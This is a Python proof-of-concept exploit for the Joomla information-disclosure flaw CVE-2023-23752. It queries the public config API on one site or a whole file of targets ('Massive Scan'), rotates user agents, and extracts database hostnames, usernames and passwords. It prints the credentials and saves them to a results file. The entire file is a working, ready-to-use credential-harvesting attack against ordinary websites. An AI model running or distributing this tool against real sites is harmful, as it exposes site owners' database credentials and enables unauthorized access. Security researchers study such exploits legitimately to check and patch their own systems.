"""Check Joomla sites for an exposed application-config API (CVE-2023-23752).

Each target is probed at ``/api/index.php/v1/config/application?public=true``.
When the response exposes the database settings they are printed and appended
to ``Results/Configurations.txt``.
"""
import asyncio
import os
import re
import time

import aiohttp
import colorama
import urllib3
from colorama import Fore, init
from fake_useragent import UserAgent

init(autoreset=True)
delete_warning = urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

if not os.path.exists('Results'):
    os.mkdir('Results')

MAX_REQUESTS_PER_SECOND = 2
# Timestamp (time.time()) of the most recently *reserved* request slot.
LAST_REQUEST_TIME = 0
user_agent_rotator = UserAgent()


def Banner():
    """Print the tool banner and author links."""
    print(Fore.LIGHTCYAN_EX+r" ___ _ _ ___ ___ ___ ___ ____ ___ ____ ___ ___ ___ ")
    print(Fore.LIGHTCYAN_EX+r"| _]| | || __] [_ ]| |[_ ][__ / ___ [_ ][__ /|_ || __|[_ ]")
    print(Fore.LIGHTCYAN_EX+r"| [__| | || _] / / | / | / / [_ \ |___| / / [_ \ / / `__ \ / / ")
    print(Fore.LIGHTCYAN_EX+r"\___/|__/ |___] [___] \__|[___][___/ [___][___//_/ |___/[___]")
    print(Fore.GREEN+"Github"+Fore.LIGHTWHITE_EX+" https://github.com/Pushkarup ")
    print(Fore.GREEN+"LinkedIn"+Fore.LIGHTWHITE_EX+" https://www.linkedin.com/in/pushkar-upadhyay ")
    print(f"{Fore.YELLOW}[PoC By PUSHKAR UPADHYAY] - {Fore.GREEN}JOOMLA DATABASE FETCH")


async def fetch(session, url):
    """GET *url* through *session*, throttled to MAX_REQUESTS_PER_SECOND.

    Args:
        session: An open ``aiohttp.ClientSession``.
        url: Absolute URL to request.

    Returns:
        A ``(body_text, http_status)`` tuple.

    Raises:
        aiohttp.ClientError, asyncio.TimeoutError: on connection failure or
            when the request exceeds the 10 second total timeout.
    """
    global LAST_REQUEST_TIME

    min_interval = 1 / MAX_REQUESTS_PER_SECOND
    now = time.time()
    # Reserve the next free slot *before* awaiting. There is no await between
    # the read and the write of LAST_REQUEST_TIME, so concurrent coroutines
    # each get a distinct slot instead of all waking up at the same instant.
    scheduled = max(now, LAST_REQUEST_TIME + min_interval)
    LAST_REQUEST_TIME = scheduled
    if scheduled > now:
        await asyncio.sleep(scheduled - now)

    # No explicit "Host" header: aiohttp derives it from the URL, and the
    # full URL (scheme + path) is not a valid Host value.
    headers = {
        "content-type": "application/vnd.api+json",
        "User-Agent": user_agent_rotator.random,
    }
    # Certificate verification stays at aiohttp's default (enabled).
    timeout = aiohttp.ClientTimeout(total=10)
    async with session.get(url, headers=headers, timeout=timeout) as response:
        # Undecodable bytes are replaced rather than aborting the scan.
        return await response.text(errors="replace"), response.status


def _normalize_target(url):
    """Return *url* as an absolute base URL without a trailing slash."""
    url = url.strip().rstrip('/')
    if '://' not in url:
        # A bare domain/IP is not an absolute URL; default to plain HTTP.
        url = 'http://' + url
    return url


def _extract_field(text, key):
    """Return the string value of JSON member *key* in *text*, or '' if absent."""
    match = re.search(rf'"{re.escape(key)}":"(.*?)"', text)
    return match.group(1) if match else ''


async def scan_single_url(session, url):
    """Probe one target and report any exposed database configuration.

    Args:
        session: An open ``aiohttp.ClientSession``.
        url: Target base URL, or a bare domain/IP (``http://`` is assumed).

    Returns:
        ``(response_text, True)`` when the config was exposed, otherwise
        ``('', False)``.

    Raises:
        aiohttp.ClientError, asyncio.TimeoutError: propagated from ``fetch``.
    """
    print(f"\n{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.GREEN}[Scanning!]")
    config_url = _normalize_target(url) + '/api/index.php/v1/config/application?public=true'
    content, status = await fetch(session, config_url)

    if status != 200 or 'dbtype' not in content:
        print(f"{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[No Sensitive Information!]")
        return '', False

    dbtype = _extract_field(content, 'dbtype')
    dbprefix = _extract_field(content, 'dbprefix')
    host = _extract_field(content, 'host')
    db = _extract_field(content, 'db')
    user = _extract_field(content, 'user')
    password = _extract_field(content, 'password')

    print(f"{Fore.YELLOW}\n[+] Domain : {Fore.GREEN}{url}")
    print(f"{Fore.YELLOW}[+] Database Type : {Fore.GREEN}{dbtype}")
    print(f"{Fore.YELLOW}[+] Database Prefix : {Fore.GREEN}{dbprefix}")
    print(f"{Fore.YELLOW}[+] Database : {Fore.GREEN}{db}")
    print(f"{Fore.YELLOW}[+] Hostname : {Fore.GREEN}{host}")
    print(f"{Fore.YELLOW}[+] Username : {Fore.GREEN}{user}")
    print(f"{Fore.YELLOW}[+] Password : {Fore.GREEN}{password}\n")

    with open('Results/Configurations.txt', 'a', encoding='utf-8') as f:
        f.write(f"[+] {url}\nDatabase Type : {dbtype}\nDatabase Prefix : {dbprefix}\nHostname : {host}\nDatabase : {db}\nUsername : {user}\nPassword : {password}\n\n")
    return content, True


async def scan_multiple_urls(filename):
    """Scan every non-blank line of *filename* as a target.

    Args:
        filename: Path to a text file with one target per line.

    Returns:
        A list with one entry per target, in file order: the
        ``(text, success)`` tuple from ``scan_single_url``, or the exception
        instance if that target's scan raised.
    """
    with open(filename, 'r') as file:
        urls = [line.strip() for line in file if line.strip()]

    async with aiohttp.ClientSession() as session:
        tasks = [scan_single_url(session, url) for url in urls]
        # return_exceptions=True: one unreachable host must not discard the
        # results of every other target.
        results = await asyncio.gather(*tasks, return_exceptions=True)

    for url, outcome in zip(urls, results):
        if isinstance(outcome, BaseException):
            print(f"{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[Error: {outcome!r}]")
    return results


def result_summarization(results):
    """Print counts of successful, failed and errored scans.

    Args:
        results: Iterable-sized collection as returned by
            ``scan_multiple_urls``: ``(text, success)`` tuples and/or
            exception instances.
    """
    error_count = sum(1 for item in results if isinstance(item, BaseException))
    successful_scans = sum(
        1 for item in results
        if not isinstance(item, BaseException) and item[1]
    )
    # "Failed" means the request completed but nothing was exposed.
    failed_scans = len(results) - successful_scans - error_count

    print("\n======== Scan Summary ========")
    print(f"Successful Scans: {successful_scans}")
    print(f"Failed Scans: {failed_scans}")
    print(f"Errors Encountered: {error_count}")


async def _scan_one(url):
    """Open a short-lived session and scan a single target."""
    async with aiohttp.ClientSession() as session:
        return await scan_single_url(session, url)


def main():
    """Interactive entry point: prompt for input and run the chosen scan."""
    try:
        # Prompt order is kept as-is: the URL file is requested before the
        # scan mode, even though only mode 2 reads it.
        filename = input(f"\n{Fore.YELLOW}Enter the filename containing URLs: {Fore.RESET}")
        if not os.path.isfile(filename):
            print(f"{Fore.RED}Error: The specified file does not exist.")
            return

        choice = input(f"\n{Fore.RED}[1] - {Fore.YELLOW}Single Scan\n{Fore.RED}[2] - {Fore.YELLOW}Massive Scan\n\n{Fore.YELLOW}[CVE-2023-23752]: {Fore.WHITE}").strip()
        if choice == '1':
            url = input(f"\n{Fore.YELLOW}Enter a single IP/Domain: {Fore.RESET}")
            asyncio.run(_scan_one(url))
        elif choice == '2':
            results = asyncio.run(scan_multiple_urls(filename))
            result_summarization(results)
        else:
            print(f"\n{Fore.RED}Invalid option selected")
    except KeyboardInterrupt:
        print(f"\n{Fore.RED}Scan interrupted by user.")
    except Exception as e:
        print(f"{Fore.RED}An unexpected error occurred: {str(e)}")


if __name__ == '__main__':
    main()